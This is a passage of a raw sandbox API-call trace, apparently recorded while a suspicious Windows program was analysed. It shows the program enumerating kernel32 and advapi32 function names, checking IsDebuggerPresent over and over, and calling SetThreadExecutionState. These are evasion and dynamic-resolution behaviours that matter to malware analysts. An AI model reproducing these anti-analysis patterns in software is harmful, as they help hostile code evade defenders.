[0158.267] lstrcpyA (in: lpString1=0x239f158, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0158.267] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0158.267] lstrcpyA (in: lpString1=0x239f158, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0158.267] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0158.267] lstrcpyA (in: lpString1=0x239f158, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0158.267] lstrlenA (lpString="CREATETHREAD") returned 12 [0158.267] lstrcpyA (in: lpString1=0x239f158, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0158.267] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0158.267] lstrcpyA (in: lpString1=0x239f158, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0158.267] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0158.267] lstrcpyA (in: lpString1=0x239f158, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0158.267] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0158.267] lstrcpyA (in: lpString1=0x239f158, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0158.267] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0158.267] lstrcpyA (in: lpString1=0x239f158, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0158.267] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0158.267] lstrcpyA (in: lpString1=0x239f158, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0158.267] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0158.267] lstrcpyA (in: lpString1=0x239f158, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0158.267] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0158.267] lstrcpyA (in: lpString1=0x239f158, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0158.267] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0158.267] lstrcpyA (in: lpString1=0x239f158, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0158.267] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0158.267] lstrcpyA (in: lpString1=0x239f158, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0158.267] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0158.268] lstrcpyA (in: lpString1=0x239f158, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0158.268] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0158.268] lstrcpyA (in: lpString1=0x239f158, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0158.268] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0158.268] lstrcpyA (in: lpString1=0x239f158, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0158.268] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0158.268] lstrcpyA (in: lpString1=0x239f158, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0158.268] lstrlenA (lpString="CTRLROUTINE") returned 11 [0158.268] lstrcpyA (in: lpString1=0x239f158, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0158.268] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0158.268] lstrcpyA (in: lpString1=0x239f158, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0158.268] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0158.268] lstrcpyA (in: lpString1=0x239f158, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0158.268] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0158.268] lstrcpyA (in: lpString1=0x239f158, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0158.268] lstrlenA (lpString="DEBUGBREAK") returned 10 [0158.268] lstrcpyA (in: lpString1=0x239f158, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0158.268] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0158.268] lstrcpyA (in: lpString1=0x239f158, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0158.268] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0158.268] lstrcpyA (in: lpString1=0x239f158, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0158.268] lstrlenA (lpString="DECODEPOINTER") returned 13 [0158.268] lstrcpyA (in: lpString1=0x239f158, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0158.268] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0158.268] lstrcpyA (in: lpString1=0x239f158, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0158.268] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0158.268] lstrcpyA (in: lpString1=0x239f158, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0158.268] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0158.268] lstrcpyA (in: lpString1=0x239f158, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0158.268] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0158.268] lstrcpyA (in: lpString1=0x239f158, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0158.268] lstrlenA (lpString="DELETEATOM") returned 10 [0158.268] lstrcpyA (in: lpString1=0x239f158, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0158.268] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0158.268] lstrcpyA (in: lpString1=0x239f158, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0158.268] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0158.269] lstrcpyA (in: lpString1=0x239f158, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0158.269] lstrlenA (lpString="DELETEFIBER") returned 11 [0158.269] lstrcpyA (in: lpString1=0x239f158, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0158.269] lstrlenA (lpString="DELETEFILEA") returned 11 [0158.269] lstrcpyA (in: lpString1=0x239f158, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0158.269] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0158.269] lstrcpyA (in: lpString1=0x239f158, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0158.269] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0158.269] lstrcpyA (in: lpString1=0x239f158, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0158.269] lstrlenA (lpString="DELETEFILEW") returned 11 [0158.269] lstrcpyA (in: lpString1=0x239f158, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0158.269] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0158.269] lstrcpyA (in: lpString1=0x239f158, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0158.269] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0158.269] lstrcpyA (in: lpString1=0x239f158, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0158.269] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0158.269] lstrcpyA (in: lpString1=0x239f158, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0158.269] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0158.269] lstrcpyA (in: lpString1=0x239f158, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0158.269] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0158.269] lstrcpyA (in: lpString1=0x239f158, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0158.269] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0158.269] lstrcpyA (in: lpString1=0x239f158, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0158.269] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0158.269] lstrcpyA (in: lpString1=0x239f158, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0158.269] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0158.269] lstrcpyA (in: lpString1=0x239f158, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0158.269] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0158.269] lstrcpyA (in: lpString1=0x239f158, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0158.269] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0158.269] lstrcpyA (in: lpString1=0x239f158, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0158.269] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0158.269] lstrcpyA (in: lpString1=0x239f158, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0158.269] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0158.270] lstrcpyA (in: lpString1=0x239f158, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0158.270] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0158.270] lstrcpyA (in: lpString1=0x239f158, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0158.270] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0158.270] lstrcpyA (in: lpString1=0x239f158, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0158.270] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0158.270] lstrcpyA (in: lpString1=0x239f158, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0158.270] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0158.270] lstrcpyA (in: lpString1=0x239f158, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0158.270] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0158.270] lstrcpyA (in: lpString1=0x239f158, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0158.270] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0158.270] lstrcpyA (in: lpString1=0x239f158, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0158.270] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0158.270] lstrcpyA (in: lpString1=0x239f158, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0158.270] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0158.270] lstrcpyA (in: lpString1=0x239f158, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0158.270] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0158.270] lstrcpyA (in: lpString1=0x239f158, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0158.270] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0158.270] lstrcpyA (in: lpString1=0x239f158, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0158.270] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0158.270] lstrcpyA (in: lpString1=0x239f158, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0158.270] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0158.270] lstrcpyA (in: lpString1=0x239f158, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0158.270] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0158.270] lstrcpyA (in: lpString1=0x239f158, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0158.270] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0158.270] lstrcpyA (in: lpString1=0x239f158, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0158.270] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0158.270] lstrcpyA (in: lpString1=0x239f158, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0158.270] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0158.270] lstrcpyA (in: lpString1=0x239f158, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0158.270] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0158.270] lstrcpyA (in: lpString1=0x239f158, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0158.270] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0158.270] lstrcpyA (in: lpString1=0x239f158, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0158.271] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0158.271] lstrcpyA (in: lpString1=0x239f158, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0158.271] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0158.271] lstrcpyA (in: lpString1=0x239f158, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0158.271] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0158.271] lstrcpyA (in: lpString1=0x239f158, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0158.271] IsDebuggerPresent () returned 0 [0158.271] IsDebuggerPresent () returned 0 [0158.272] IsDebuggerPresent () returned 0 [0158.272] IsDebuggerPresent () returned 0 [0158.272] IsDebuggerPresent () returned 0 [0158.272] IsDebuggerPresent () returned 0 [0158.272] IsDebuggerPresent () returned 0 [0158.272] IsDebuggerPresent () returned 0 [0158.272] IsDebuggerPresent () returned 0 [0158.272] IsDebuggerPresent () returned 0 [0158.273] IsDebuggerPresent () returned 0 [0158.273] IsDebuggerPresent () returned 0 [0158.273] IsDebuggerPresent () returned 0 [0158.273] IsDebuggerPresent () returned 0 [0158.273] IsDebuggerPresent () returned 0 [0158.273] IsDebuggerPresent () returned 0 [0158.273] IsDebuggerPresent () returned 0 [0158.273] IsDebuggerPresent () returned 0 [0158.273] IsDebuggerPresent () returned 0 [0158.273] IsDebuggerPresent () returned 0 [0158.274] IsDebuggerPresent () returned 0 [0158.274] IsDebuggerPresent () returned 0 [0158.274] IsDebuggerPresent () returned 0 [0158.274] IsDebuggerPresent () returned 0 [0158.274] IsDebuggerPresent () returned 0 [0158.274] IsDebuggerPresent () returned 0 [0158.274] IsDebuggerPresent () returned 0 [0158.274] IsDebuggerPresent () returned 0 [0158.274] IsDebuggerPresent () returned 0 [0158.274] IsDebuggerPresent () returned 0 [0158.275] IsDebuggerPresent () returned 0 [0158.275] IsDebuggerPresent () returned 0 [0158.275] IsDebuggerPresent () returned 0 [0158.275] IsDebuggerPresent () returned 0 [0158.275] IsDebuggerPresent () returned 0 [0158.275] IsDebuggerPresent () returned 0 [0158.275] IsDebuggerPresent () returned 0 [0158.275] IsDebuggerPresent () returned 0 [0158.275] IsDebuggerPresent () returned 0 [0158.276] IsDebuggerPresent () returned 0 [0158.276] IsDebuggerPresent () returned 0 [0158.276] IsDebuggerPresent () returned 0 [0158.276] IsDebuggerPresent () returned 0 [0158.276] IsDebuggerPresent () returned 0 [0158.276] IsDebuggerPresent () returned 0 [0158.277] IsDebuggerPresent () returned 0 [0158.277] IsDebuggerPresent () returned 0 [0158.277] IsDebuggerPresent () returned 0 [0158.284] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x120000 [0158.291] SetThreadExecutionState (esFlags=0x80000001) returned 0x80000000 [0158.291] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x130000 [0158.294] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x140000 [0158.295] VirtualAlloc (lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x4) returned 0x150000 [0158.298] VirtualAlloc (lpAddress=0x0, dwSize=0x40, flAllocationType=0x3000, flProtect=0x4) returned 0x160000 [0158.298] VirtualAlloc (lpAddress=0x0, dwSize=0x80, flAllocationType=0x3000, flProtect=0x4) returned 0x170000 [0158.298] lstrlenA (lpString="advapi32.dll") returned 12 [0158.299] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x77010000 [0158.299] lstrcpyA (in: lpString1=0x239e35c, lpString2="A_SHAFinal" | out: lpString1="A_SHAFinal") returned="A_SHAFinal" [0158.299] lstrlenA (lpString="A_SHAFINAL") returned 10 [0158.299] lstrcpyA (in: lpString1=0x239e35c, lpString2="A_SHAInit" | out: lpString1="A_SHAInit") returned="A_SHAInit" [0158.299] lstrlenA (lpString="A_SHAINIT") returned 9 [0158.299] lstrcpyA (in: lpString1=0x239e35c, lpString2="A_SHAUpdate" | out: lpString1="A_SHAUpdate") returned="A_SHAUpdate" [0158.299] lstrlenA (lpString="A_SHAUPDATE") returned 11 [0158.299] lstrcpyA (in: lpString1=0x239e35c, lpString2="AbortSystemShutdownA" | out: lpString1="AbortSystemShutdownA") returned="AbortSystemShutdownA" [0158.299] lstrlenA (lpString="ABORTSYSTEMSHUTDOWNA") returned 20 [0158.299] lstrcpyA (in: lpString1=0x239e35c, lpString2="AbortSystemShutdownW" | out: lpString1="AbortSystemShutdownW") returned="AbortSystemShutdownW" [0158.299] lstrlenA (lpString="ABORTSYSTEMSHUTDOWNW") returned 20 [0158.299] lstrcpyA (in: lpString1=0x239e35c, lpString2="AccessCheck" | out: lpString1="AccessCheck") returned="AccessCheck" [0158.299] lstrlenA (lpString="ACCESSCHECK") returned 11 [0158.299] lstrcpyA (in: lpString1=0x239e35c, lpString2="AccessCheckAndAuditAlarmA" | out: lpString1="AccessCheckAndAuditAlarmA") returned="AccessCheckAndAuditAlarmA" [0158.299] lstrlenA (lpString="ACCESSCHECKANDAUDITALARMA") returned 25 [0158.299] lstrcpyA (in: lpString1=0x239e35c, lpString2="AccessCheckAndAuditAlarmW" | out: lpString1="AccessCheckAndAuditAlarmW") returned="AccessCheckAndAuditAlarmW" [0158.299] lstrlenA (lpString="ACCESSCHECKANDAUDITALARMW") returned 25 [0158.299] lstrcpyA (in: lpString1=0x239e35c, lpString2="AccessCheckByType" | out: lpString1="AccessCheckByType") returned="AccessCheckByType" [0158.299] lstrlenA (lpString="ACCESSCHECKBYTYPE") returned 17 [0158.299] lstrcpyA (in: lpString1=0x239e35c, lpString2="AccessCheckByTypeAndAuditAlarmA" | out: lpString1="AccessCheckByTypeAndAuditAlarmA") returned="AccessCheckByTypeAndAuditAlarmA" [0158.299] lstrlenA (lpString="ACCESSCHECKBYTYPEANDAUDITALARMA") returned 31 [0158.299] lstrcpyA (in: lpString1=0x239e35c, lpString2="AccessCheckByTypeAndAuditAlarmW" | out: lpString1="AccessCheckByTypeAndAuditAlarmW") returned="AccessCheckByTypeAndAuditAlarmW" [0158.299] lstrlenA (lpString="ACCESSCHECKBYTYPEANDAUDITALARMW") returned 31 [0158.299] lstrcpyA (in: lpString1=0x239e35c, lpString2="AccessCheckByTypeResultList" | out: lpString1="AccessCheckByTypeResultList") returned="AccessCheckByTypeResultList" [0158.299] lstrlenA (lpString="ACCESSCHECKBYTYPERESULTLIST") returned 27 [0158.299] lstrcpyA (in: lpString1=0x239e35c, lpString2="AccessCheckByTypeResultListAndAuditAlarmA" | out: lpString1="AccessCheckByTypeResultListAndAuditAlarmA") returned="AccessCheckByTypeResultListAndAuditAlarmA" [0158.299] lstrlenA (lpString="ACCESSCHECKBYTYPERESULTLISTANDAUDITALARMA") returned 41 [0158.299] lstrcpyA (in: lpString1=0x239e35c, lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA" | out: lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned="AccessCheckByTypeResultListAndAuditAlarmByHandleA" [0158.299] lstrlenA (lpString="ACCESSCHECKBYTYPERESULTLISTANDAUDITALARMBYHANDLEA") returned 49 [0158.299] lstrcpyA (in: lpString1=0x239e35c, lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW" | out: lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned="AccessCheckByTypeResultListAndAuditAlarmByHandleW" [0158.299] lstrlenA (lpString="ACCESSCHECKBYTYPERESULTLISTANDAUDITALARMBYHANDLEW") returned 49 [0158.299] lstrcpyA (in: lpString1=0x239e35c, lpString2="AccessCheckByTypeResultListAndAuditAlarmW" | out: lpString1="AccessCheckByTypeResultListAndAuditAlarmW") returned="AccessCheckByTypeResultListAndAuditAlarmW" [0158.300] lstrlenA (lpString="ACCESSCHECKBYTYPERESULTLISTANDAUDITALARMW") returned 41 [0158.300] lstrcpyA (in: lpString1=0x239e35c, lpString2="AddAccessAllowedAce" | out: lpString1="AddAccessAllowedAce") returned="AddAccessAllowedAce" [0158.300] lstrlenA (lpString="ADDACCESSALLOWEDACE") returned 19 [0158.300] lstrcpyA (in: lpString1=0x239e35c, lpString2="AddAccessAllowedAceEx" | out: lpString1="AddAccessAllowedAceEx") returned="AddAccessAllowedAceEx" [0158.300] lstrlenA (lpString="ADDACCESSALLOWEDACEEX") returned 21 [0158.300] lstrcpyA (in: lpString1=0x239e35c, lpString2="AddAccessAllowedObjectAce" | out: lpString1="AddAccessAllowedObjectAce") returned="AddAccessAllowedObjectAce" [0158.300] lstrlenA (lpString="ADDACCESSALLOWEDOBJECTACE") returned 25 [0158.300] lstrcpyA (in: lpString1=0x239e35c, lpString2="AddAccessDeniedAce" | out: lpString1="AddAccessDeniedAce") returned="AddAccessDeniedAce" [0158.300] lstrlenA (lpString="ADDACCESSDENIEDACE") returned 18 [0158.300] lstrcpyA (in: lpString1=0x239e35c, lpString2="AddAccessDeniedAceEx" | out: lpString1="AddAccessDeniedAceEx") returned="AddAccessDeniedAceEx" [0158.300] lstrlenA (lpString="ADDACCESSDENIEDACEEX") returned 20 [0158.300] lstrcpyA (in: lpString1=0x239e35c, lpString2="AddAccessDeniedObjectAce" | out: lpString1="AddAccessDeniedObjectAce") returned="AddAccessDeniedObjectAce" [0158.300] lstrlenA (lpString="ADDACCESSDENIEDOBJECTACE") returned 24 [0158.300] lstrcpyA (in: lpString1=0x239e35c, lpString2="AddAce" | out: lpString1="AddAce") returned="AddAce" [0158.300] lstrlenA (lpString="ADDACE") returned 6 [0158.300] lstrcpyA (in: lpString1=0x239e35c, lpString2="AddAuditAccessAce" | out: lpString1="AddAuditAccessAce") returned="AddAuditAccessAce" [0158.300] lstrlenA (lpString="ADDAUDITACCESSACE") returned 17 [0158.300] lstrcpyA (in: lpString1=0x239e35c, lpString2="AddAuditAccessAceEx" | out: lpString1="AddAuditAccessAceEx") returned="AddAuditAccessAceEx" [0158.300] lstrlenA (lpString="ADDAUDITACCESSACEEX") returned 19 [0158.300] lstrcpyA (in: lpString1=0x239e35c, lpString2="AddAuditAccessObjectAce" | out: lpString1="AddAuditAccessObjectAce") returned="AddAuditAccessObjectAce" [0158.300] lstrlenA (lpString="ADDAUDITACCESSOBJECTACE") returned 23 [0158.300] lstrcpyA (in: lpString1=0x239e35c, lpString2="AddConditionalAce" | out: lpString1="AddConditionalAce") returned="AddConditionalAce" [0158.300] lstrlenA (lpString="ADDCONDITIONALACE") returned 17 [0158.300] lstrcpyA (in: lpString1=0x239e35c, lpString2="AddMandatoryAce" | out: lpString1="AddMandatoryAce") returned="AddMandatoryAce" [0158.300] lstrlenA (lpString="ADDMANDATORYACE") returned 15 [0158.300] lstrcpyA (in: lpString1=0x239e35c, lpString2="AddUsersToEncryptedFile" | out: lpString1="AddUsersToEncryptedFile") returned="AddUsersToEncryptedFile" [0158.300] lstrlenA (lpString="ADDUSERSTOENCRYPTEDFILE") returned 23 [0158.300] lstrcpyA (in: lpString1=0x239e35c, lpString2="AddUsersToEncryptedFileEx" | out: lpString1="AddUsersToEncryptedFileEx") returned="AddUsersToEncryptedFileEx" [0158.300] lstrlenA (lpString="ADDUSERSTOENCRYPTEDFILEEX") returned 25 [0158.300] lstrcpyA (in: lpString1=0x239e35c, lpString2="AdjustTokenGroups" | out: lpString1="AdjustTokenGroups") returned="AdjustTokenGroups" [0158.300] lstrlenA (lpString="ADJUSTTOKENGROUPS") returned 17 [0158.300] lstrcpyA (in: lpString1=0x239e35c, lpString2="AdjustTokenPrivileges" | out: lpString1="AdjustTokenPrivileges") returned="AdjustTokenPrivileges" [0158.300] lstrlenA (lpString="ADJUSTTOKENPRIVILEGES") returned 21 [0158.300] lstrcpyA (in: lpString1=0x239e35c, lpString2="AllocateAndInitializeSid" | out: lpString1="AllocateAndInitializeSid") returned="AllocateAndInitializeSid" [0158.300] lstrlenA (lpString="ALLOCATEANDINITIALIZESID") returned 24 [0158.300] lstrcpyA (in: lpString1=0x239e35c, lpString2="AllocateLocallyUniqueId" | out: lpString1="AllocateLocallyUniqueId") returned="AllocateLocallyUniqueId" [0158.301] lstrlenA (lpString="ALLOCATELOCALLYUNIQUEID") returned 23 [0158.301] lstrcpyA (in: lpString1=0x239e35c, lpString2="AreAllAccessesGranted" | out: lpString1="AreAllAccessesGranted") returned="AreAllAccessesGranted" [0158.301] lstrlenA (lpString="AREALLACCESSESGRANTED") returned 21 [0158.301] lstrcpyA (in: lpString1=0x239e35c, lpString2="AreAnyAccessesGranted" | out: lpString1="AreAnyAccessesGranted") returned="AreAnyAccessesGranted" [0158.301] lstrlenA (lpString="AREANYACCESSESGRANTED") returned 21 [0158.301] lstrcpyA (in: lpString1=0x239e35c, lpString2="AuditComputeEffectivePolicyBySid" | out: lpString1="AuditComputeEffectivePolicyBySid") returned="AuditComputeEffectivePolicyBySid" [0158.301] lstrlenA (lpString="AUDITCOMPUTEEFFECTIVEPOLICYBYSID") returned 32 [0158.301] lstrcpyA (in: lpString1=0x239e35c, lpString2="AuditComputeEffectivePolicyByToken" | out: lpString1="AuditComputeEffectivePolicyByToken") returned="AuditComputeEffectivePolicyByToken" [0158.301] lstrlenA (lpString="AUDITCOMPUTEEFFECTIVEPOLICYBYTOKEN") returned 34 [0158.301] lstrcpyA (in: lpString1=0x239e35c, lpString2="AuditEnumerateCategories" | out: lpString1="AuditEnumerateCategories") returned="AuditEnumerateCategories" [0158.301] lstrlenA (lpString="AUDITENUMERATECATEGORIES") returned 24 [0158.301] lstrcpyA (in: lpString1=0x239e35c, lpString2="AuditEnumeratePerUserPolicy" | out: lpString1="AuditEnumeratePerUserPolicy") returned="AuditEnumeratePerUserPolicy" [0158.301] lstrlenA (lpString="AUDITENUMERATEPERUSERPOLICY") returned 27 [0158.301] lstrcpyA (in: lpString1=0x239e35c, lpString2="AuditEnumerateSubCategories" | out: lpString1="AuditEnumerateSubCategories") returned="AuditEnumerateSubCategories" [0158.301] lstrlenA (lpString="AUDITENUMERATESUBCATEGORIES") returned 27 [0158.301] lstrcpyA (in: lpString1=0x239e35c, lpString2="AuditFree" | out: lpString1="AuditFree") returned="AuditFree" [0158.301] lstrlenA (lpString="AUDITFREE") returned 9 [0158.301] lstrcpyA (in: lpString1=0x239e35c, 